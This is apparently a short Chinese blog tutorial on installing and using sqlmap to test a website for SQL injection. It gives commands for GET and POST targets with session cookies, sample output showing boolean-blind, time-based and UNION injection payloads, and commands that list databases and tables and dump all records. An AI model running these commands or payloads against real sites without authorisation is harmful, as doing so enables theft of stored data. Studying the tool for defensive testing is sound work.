使用sqlmap工具測試網站安全性(sql注入等)
阿新 • • 發佈:2019-01-21
sqlmap工具的正常使用依賴python,所以要先安裝python。
python下載地址:https://www.python.org/(下載2.7版本的)
sqlmap下載地址:http://sqlmap.org/
這兩個安裝好之後,把路徑寫入環境變數,便於使用。
1. sql注入檢測
A.【get方式請求的地址】不需要登入時,使用(sqlmap.py -u “測試訪問地址”)即可。
例如:
sqlmap.py -u "localhost:81/goodnews/info?id=64"
B. 【get方式請求的地址】需要登入時,使用(sqlmap.py -u “測試訪問地址”--cookie="從瀏覽器除錯中複製出cookie值"
如果注入成功的話,會顯示注入方法,例如:
sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=60 AND 4982=4982 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=60 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=-8952 UNION ALL SELECT NULL,CONCAT(0x716b787071,0x5467584242446b6d71564e734e4e57484a564f6a6f6c55517444446f58655476496b565172694d74,0x7178766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZefZ
C. 【post方式請求的地址】需要登入時,使用(sqlmap.py -u “測試訪問地址”--cookie="從瀏覽器除錯中複製出cookie值" --data="瀏覽器除錯中獲取(如下)")注入;
如上幾種方法,一旦注入成功,那麼接下來就可以獲取資料庫資訊了
(sqlmap.py -u “測試訪問地址”--dbs):
更甚者可以獲取所有資料表(sqlmap.py -u “測試訪問地址”--tables):
還可以獲取所有記錄(sqlmap.py -u “測試訪問地址”--dump);
當然,還有許多其他的命令用法,可以參考sqlmap的文件進行學習。